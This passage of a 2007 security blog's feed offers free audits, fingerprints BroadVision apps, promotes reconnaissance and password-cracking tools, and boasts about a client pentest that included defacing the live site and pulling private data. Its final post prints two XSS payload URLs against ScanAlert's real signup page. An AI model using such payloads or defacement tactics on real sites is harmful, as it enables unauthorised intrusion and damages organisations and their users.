alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2429153711923700052/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2429153711923700052' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2429153711923700052'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2429153711923700052'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/web-application-security-with-joe.html' title='Web Application Security with Joe Walker'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-970476624288276960</id><published>2007-10-31T08:03:00.000+08:00</published><updated>2007-10-31T08:34:33.733+08:00</updated><title type='text'>Free Audit, Is it Real??</title><content type='html'>Ok, I am providing free audits for those who need my help in securing their applications or networks, and read properly: I am &lt;strong&gt;NOT &lt;/strong&gt;charging a single cent for my effort in helping you. The reason for doing so is that I am giving back to the community that once helped me get where I am today. I remember I was hacking like nobody's business back in the day with trojans, port scanning, exploits, etc. I was very young then and indeed very enthusiastic about all sorts of hacking. Today, because of the busy work schedule and commitments I have, I tend to have less time for reading or researching. 
However, I am still pretty much involved in the security community when it comes to networking and web applications. There are actually quite a number of people who approached me for free auditing of their public facing web applications, and I actually managed to test their sites and show them what I had found. Of course, I cannot reveal any of those clients I did before, but trust me, some of them are huge organizations and of course some are my friends.&lt;br /&gt;&lt;br /&gt;To get a free audit, I need the following details:&lt;br /&gt;&lt;br /&gt;1. Prove that you are the owner of the site or network.&lt;br /&gt;&lt;br /&gt;2. Personal details of yourself.&lt;br /&gt;&lt;br /&gt;3. If you are from a company, use your company's email to send me an email and follow up with a call to my mobile.&lt;br /&gt;&lt;br /&gt;4. If you are an individual, I would require you to give me a call on my mobile or Skype. Send me an email first at hackathology@gmail.com&lt;br /&gt;&lt;br /&gt;5. If there should be any meetup, prepare a Non-Disclosure Agreement for signing if required and discuss the Scope Of Work.&lt;br /&gt;&lt;br /&gt;I cannot guarantee I have the time to test and deliver on time for each and every customer if the request traffic is high; however, I will do my best to deliver what I promised. Also, if the scope gets larger, then the delay will be longer; it all depends. Don't forget I have a day job and am doing a favour for you. 
Lastly, should there be any changes to the audit details, I will update them here on my blog.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-970476624288276960?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/970476624288276960/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=970476624288276960' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/970476624288276960'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/970476624288276960'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/free-audit-is-it-real.html' title='Free Audit, Is it Real??'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-3414742689034126196</id><published>2007-10-30T07:42:00.000+08:00</published><updated>2007-10-30T08:07:46.440+08:00</updated><title type='text'>Detecting BroadVision Applications. Are they secure?</title><content type='html'>Are proprietary applications secure? Well, I guess yes and no. Security researchers are constantly searching for flaws in those applications, and only if a bug is reported will the company take action to close their loopholes. I am currently auditing a BroadVision application and what a surprise I got from my results. 
I am not supposed to reveal anything, but let me tell you, for a critical application like this, I am not sure if the customer is using an old version of BroadVision or if the input was simply not checked and sanitized. I could basically do pretty much anything I wanted with that application and create havoc. Too bad I can't show anything here, but trust me, if you guys get a chance to audit a BroadVision application, you will be surprised by the kind of flaws you find. It's basically like opening a can of worms, waiting for someone to feed on it.&lt;br /&gt;&lt;br /&gt;Well, at first I wasn't sure it was a BroadVision application; however, after some research and observation of the HTTP headers, this is what I got:&lt;br /&gt;&lt;br /&gt;POST http://example.com/&lt;strong&gt;bvsn/bvcom&lt;/strong&gt;/en/server/whereto.jsp?&lt;strong&gt;BV_SessionID&lt;/strong&gt;=NNNN1809204881.10923774158NNNN&amp;&lt;strong&gt;BV_EngineID&lt;/strong&gt;=nnndaoplghjkiihcfklcfkmdgohdgih.0&amp;BV_Use&lt;strong&gt;BVCookie&lt;/strong&gt;=yes HTTP/1.0&lt;br /&gt;&lt;br /&gt;The killer signature here is the parameter names BV_SessionID and BV_EngineID. If you see these anywhere in a URL or in an HTTP header, you have more or less nailed down a BroadVision application. Of course there are some other indicators, like checking for the .do extension; however, that wasn't seen during the audit. Google for those highlighted in bold and you will see what I mean. I am now signing off here and going back for another round of audit. 
I am going to pretty much cripple the whole application this time round.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-3414742689034126196?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/3414742689034126196/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=3414742689034126196' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3414742689034126196'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3414742689034126196'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/detecting-broadvision-applications-are.html' title='Detecting BroadVision Applications. Are they secure?'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-435414991779869490</id><published>2007-10-29T20:09:00.000+08:00</published><updated>2007-10-29T22:43:20.556+08:00</updated><title type='text'>Injection Vectors, Are you up for it?</title><content type='html'>Recently, I have been doing a lot of web penetration tests and I realised that most of them suffer from injection flaws. Well, some can be deadly and some were just pretty minor. 
Well, it doesn't matter how severe the injection point is; if your site can be injected, it means that there is still some sanitizing and input validation work which needs to be followed up. Whenever I perform a penetration test on a huge organization, scanners are always deemed useless and I have to do it manually with some form of checklist I keep. Well, I managed to download a list of injection vectors from my friend Andres and that certainly helped me save time googling for attack vectors. For those who do web penetration tests, this will be very useful and will save you hours and hours of looking, reading or searching around for information.&lt;br /&gt;&lt;br /&gt;****************Start of the injection list*********************************&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp2.blogger.com/_Zx8XWzC_KPQ/RyXwYoEF9ZI/AAAAAAAAAeI/yio2FgCWaBw/s1600-h/ls1.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_Zx8XWzC_KPQ/RyXwYoEF9ZI/AAAAAAAAAeI/yio2FgCWaBw/s400/ls1.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5126768056693290386" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp3.blogger.com/_Zx8XWzC_KPQ/RyXwh4EF9aI/AAAAAAAAAeQ/fWRguC6gPpY/s1600-h/ls2.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_Zx8XWzC_KPQ/RyXwh4EF9aI/AAAAAAAAAeQ/fWRguC6gPpY/s400/ls2.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5126768215607080354" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp2.blogger.com/_Zx8XWzC_KPQ/RyXwtoEF9bI/AAAAAAAAAeY/zPhSNrXpjr8/s1600-h/ls3.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_Zx8XWzC_KPQ/RyXwtoEF9bI/AAAAAAAAAeY/zPhSNrXpjr8/s400/ls3.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5126768417470543282" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a 
href="http://bp0.blogger.com/_Zx8XWzC_KPQ/RyXw1IEF9cI/AAAAAAAAAeg/gw9UPByzq_Y/s1600-h/ls4.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/RyXw1IEF9cI/AAAAAAAAAeg/gw9UPByzq_Y/s400/ls4.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5126768546319562178" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp1.blogger.com/_Zx8XWzC_KPQ/RyXxAYEF9dI/AAAAAAAAAeo/t6bsMLSjDTY/s1600-h/ls5.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp1.blogger.com/_Zx8XWzC_KPQ/RyXxAYEF9dI/AAAAAAAAAeo/t6bsMLSjDTY/s400/ls5.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5126768739593090514" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/RyXxRIEF9eI/AAAAAAAAAew/592w7ZXaqXE/s1600-h/ls6.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/RyXxRIEF9eI/AAAAAAAAAew/592w7ZXaqXE/s400/ls6.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5126769027355899362" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/RyXxaIEF9fI/AAAAAAAAAe4/7vcTbOdjJLk/s1600-h/ls7.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/RyXxaIEF9fI/AAAAAAAAAe4/7vcTbOdjJLk/s400/ls7.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5126769181974722034" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;*****************************END*****************************************************&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-435414991779869490?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 
href='http://hackathology.blogspot.com/feeds/435414991779869490/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=435414991779869490' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/435414991779869490'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/435414991779869490'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/attack-vectors.html' title='Injection Vectors, Are you up for it?'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_Zx8XWzC_KPQ/RyXwYoEF9ZI/AAAAAAAAAeI/yio2FgCWaBw/s72-c/ls1.JPG' height='72' width='72'/><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-1223679743340441149</id><published>2007-10-28T01:16:00.000+08:00</published><updated>2007-10-28T01:33:17.752+08:00</updated><title type='text'>An Important Lesson, Passive Enumeration with Paterva</title><content type='html'>I am about to be assigned to a very exciting project, and one of the most important elements of hacking is passive enumeration. I mean, to bring down an organization or their networks, passive enumeration is definitely a must! This weekend I was scouring around for effective tools that would allow me to perform my search much faster and in a more logical and graphical manner, and I happened to stumble on a site called Paterva. This is a wonderful toy for passive enumeration. 
You can basically search for a person, DNS name, website, email, etc. and it will return results on what a person has visited, the sites he visited, the words he used, etc. Of course, instead of searching for a person, you can also perform searches for an organization. I know people are going to say that this can also be done with Google dorking. Well, that's absolutely true; Google dorking is much more powerful, with more explosive results. However, not everyone is an expert in that area, and I mean this is only the surface of passive enumeration. To go deeper, you would of course require certain skills like Google dorking. I am pretty happy with Paterva because of its simplicity and its ability to produce results in a more systematic manner. Try it for yourself.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://maltego1.paterva.com/maltego-classic.html"&gt;http://maltego1.paterva.com/maltego-classic.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.paterva.com/web/Maltego"&gt;http://www.paterva.com/web/Maltego&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp3.blogger.com/_Zx8XWzC_KPQ/RyN2HYEF9YI/AAAAAAAAAeA/CCbCZrtLvHo/s1600-h/paterva.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_Zx8XWzC_KPQ/RyN2HYEF9YI/AAAAAAAAAeA/CCbCZrtLvHo/s400/paterva.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5126070669968536962" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-1223679743340441149?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/1223679743340441149/comments/default' title='Post Comments'/><link rel='replies' type='text/html' 
href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=1223679743340441149' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1223679743340441149'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1223679743340441149'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/important-lesson-passive-enumeration.html' title='An Important Lesson, Passive Enumeration with Paterva'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_Zx8XWzC_KPQ/RyN2HYEF9YI/AAAAAAAAAeA/CCbCZrtLvHo/s72-c/paterva.JPG' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-6932673605363674734</id><published>2007-10-26T12:14:00.001+08:00</published><updated>2007-10-26T12:28:12.898+08:00</updated><title type='text'>Citrix Hacking</title><content type='html'>A few weeks ago, pdp released an article about Citrix hacking and it actually caught my attention. I read through a total of 4 of pdp's posts and also wirepair's whitepaper on hacking Citrix. It was overall a basic yet interesting article and actually gave me an idea on how to start enumerating and hacking Citrix. Well, for my next trick, when I am about to audit Citrix soon, I will start employing the techniques that were discussed in the article and also include one of my favourite tricks of all time that would actually find flaws in the Citrix application. This would actually test how robust the Citrix application is and how it can handle certain payloads. 
Since Citrix is not taking security seriously, according to wirepair's article, I would not hesitate to publish any flaws I find. With that being said, of course I would give them a chance and see what their response is.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-6932673605363674734?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/6932673605363674734/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=6932673605363674734' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6932673605363674734'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6932673605363674734'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/citrix-hacking.html' title='Citrix Hacking'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-1834709998364258344</id><published>2007-10-25T12:01:00.000+08:00</published><updated>2007-10-25T12:14:59.562+08:00</updated><title type='text'>Checkpwd 2.00 A12 released</title><content type='html'>Alexander Kornbrust of Red Database Security just released the much anticipated checkpwd Oracle password cracking tool. This release has many improvements over the previous releases. 
Some of those include:&lt;br /&gt;&lt;br /&gt;* support for Oracle 11g passwords&lt;br /&gt;* support for APEX passwords (1.4-3.0.1)&lt;br /&gt;* collect passwords from the database&lt;br /&gt;* collect password candidates from the database&lt;br /&gt;* option not to display the Oracle password on the command line&lt;br /&gt;* crack passwords from the password history&lt;br /&gt;* crack role passwords&lt;br /&gt;* save the checkpwd default configuration in a configuration file&lt;br /&gt;* read username and password hashes from a file&lt;br /&gt;&lt;br /&gt;Well, personally I tried version 1.21 months ago and it wasn't bad at all. And now comes version 2? You bet it will be much more interesting to test out the new features and see how the tool produces its results. Weeks ago, THC, a German underground hacking community, released an Oracle 11g password cracker, and I must admit that I haven't tried it yet, but now Alex has incorporated Oracle Database 11g password cracking abilities into checkpwd 2.00.&lt;br /&gt;&lt;br /&gt;For those who don't know, Alex is a world-renowned Oracle security expert. He is constantly reporting Oracle bugs to Oracle and has published a lot of whitepapers and given talks at conferences regarding Oracle security. I met him once in Dubai and I must say he is a humble and patient person with amazing Oracle security knowledge. 
To find out more, check him out at the following links:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.red-database-security.com"&gt;http://www.red-database-security.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://blog.red-database-security.com"&gt;http://blog.red-database-security.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-1834709998364258344?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/1834709998364258344/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=1834709998364258344' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1834709998364258344'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1834709998364258344'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/checkpwd-200-a12-released.html' title='Checkpwd 2.00 A12 released'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-6821468743689708779</id><published>2007-10-21T21:26:00.000+08:00</published><updated>2007-10-22T17:50:23.977+08:00</updated><title type='text'>Results from Hacking a huge organization</title><content type='html'>The other night I was auditing one of the customers here in Singapore. It was a huge organization with a massive workforce and manpower. 
Normally, huge organizations tend to give people the impression that they must be secure, because either they have enough internal people to do the patching or they must be doing some kind of upgrade work every now and then to keep their servers or networks compliant with the government authority.&lt;br /&gt;&lt;br /&gt;The results from my audit showed that life isn't a bed of roses. Multiple servers suffered from DoS and buffer overflow flaws, and one of them even allowed me to escalate to admin privileges. Well, the results were really astonishing for such a reputable organization, and everything was under my control. Of course, I managed to capture screenshots of everything I did and wrote a report for the management. I am wondering what they will do about it. They could either pray hard that no one attacks them and start patching, or expect the worst, where they could be brought down any time, any day. &lt;br /&gt;&lt;br /&gt;One of the coolest things I did during the audit was the defacement of their website. Personally, I had never defaced a website before that day. It was great seeing a big organization's website showing your own selected message or picture, definitely tarnishing their reputation, and the feeling was just too ecstatic. Of course, I had to wrap it up fast by taking a screenshot of it and restoring their site back to normal, or I would be screwed. The last thing I observed and found out was that they were using a very old operating system where most of their crucial data was residing. It was exhilarating as I was poking my way through to grab all their private data. All in all, it was just bad, really bad. I am about to finish the report and send it to the customer. 
I just want to see what the response is going to be.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-6821468743689708779?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/6821468743689708779/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=6821468743689708779' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6821468743689708779'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6821468743689708779'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/results-from-hacking-huge-organization.html' title='Results from Hacking a huge organization'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-3624225922738251081</id><published>2007-10-20T00:07:00.000+08:00</published><updated>2007-10-20T00:19:27.869+08:00</updated><title type='text'>Short update on audit</title><content type='html'>For those of you guys who are waiting for the results of the audit, because of the things I found and the sheer volume of report writing I am doing, I will only update the findings next week when I finish the report. 
Sorry for the wait, but thanks for the understanding.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-3624225922738251081?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/3624225922738251081/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=3624225922738251081' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3624225922738251081'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3624225922738251081'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/short-update-on-audit.html' title='Short update on audit'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-6195327413776367109</id><published>2007-10-18T22:37:00.000+08:00</published><updated>2007-10-22T17:48:11.340+08:00</updated><title type='text'>e... singapore, re-evaluate your website!</title><content type='html'>Well, I am roughly 10 mins away from starting an audit, but anyway, I would love to talk about e... Singapore. I heard quite a few bad things about e... Singapore, and I remembered that while I was in Dubai I asked them for a job, but in the end they voided my application. Back in Singapore, my colleagues were just talking about security companies in Singapore and they mentioned e.... 
I have no grudges against e..., but frankly speaking, as an MSS now trying to expand their business into the IS field, I am issuing a challenge to them. By just browsing their websites, I am pretty sure that they can be Own3d! My guess is that they could easily be using IIS 5 or 6, and of this I can be sure just by testing one of their functions, without scanning their website. As for owning them, I am pretty sure they tightened up most of the holes, &lt;strong&gt;EXCEPT&lt;/strong&gt; for one. All in all, if they want to step into the IS field, the first step would be to tighten their own holes first, or else how could they convince people that they are doing IS when their own site is at risk? e..., get your internal auditors to re-evaluate the e... website, or get me at &lt;strong&gt;NO&lt;/strong&gt; cost to help you do the job. &lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-6195327413776367109?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/6195327413776367109/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=6195327413776367109' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6195327413776367109'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6195327413776367109'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/e-cop-singapore-re-evaluate-your.html' title='e... 
singapore, re-evaluate your website!'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2882834898183128099</id><published>2007-10-18T19:05:00.000+08:00</published><updated>2007-10-18T21:58:01.127+08:00</updated><title type='text'>ScanAlert, Hacker Safe?</title><content type='html'>&lt;a href="http://bp3.blogger.com/_Zx8XWzC_KPQ/RxdmPpewLkI/AAAAAAAAAd4/axbyWYack2Y/s1600-h/fucked.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_Zx8XWzC_KPQ/RxdmPpewLkI/AAAAAAAAAd4/axbyWYack2Y/s400/fucked.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5122675520176139842" /&gt;&lt;/a&gt;&lt;br /&gt;Yesterday, I heard from my colleagues that we would be joining forces with ScanAlert and I was really puzzled by the move. I was asking myself whether ScanAlert is really Hacker Safe. Are they really that good with their scanners? Did they use open source scanners and customize them to their own needs? Are the clients they have really safe from hackers? Can I say that if I use ScanAlert's service to scan my website or network, I will be safe from hackers? There are a lot of questions in my head, and I think ScanAlert has a good way of doing marketing. They make every customer insert their logo onto their own site, which provides more visibility for ScanAlert's service. Well, it is good from a company point of view because they are recognized and make money out of it; however, that doesn't mean that by using their service I will be free from attackers. Not long ago, I remember members of sla.ckers.org posted XSS vulnerabilities on their site. So can I say that if I can find XSS on their site, their scanners are shitty and they are still Hacker Safe? 
I don't know, just my 2 cents' worth. Anyway, I managed to dig out the XSS vector that was injected at their site some time ago; however, they have already patched it.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.scanalert.com/SignUp.sa?act=step1&amp;oc=%27%29return+0%3B%7Dalert%280%29%3Bfunction+blah%28%29%7Bif+%280%29%7B%2F%2F"&gt;https://www.scanalert.com/SignUp.sa?act=step1&amp;oc=%27%29return+0%3B%7Dalert%280%29%3Bfunction+blah%28%29%7Bif+%280%29%7B%2F%2F&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.scanalert.com/SignUp.sa?adds106=2&amp;act=step3&amp;company.name=touchme%22%20onmouseover=%22alert('Hacker%20Safe?');%22"&gt;https://www.scanalert.com/SignUp.sa?adds106=2&amp;act=step3&amp;company.name=touchme%22%20onmouseover=%22alert('Hacker%20Safe?');%22 &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2882834898183128099?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2882834898183128099/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2882834898183128099' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2882834898183128099'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2882834898183128099'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/scanalert-hacker-safe.html' title='ScanAlert, Hacker Safe?'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
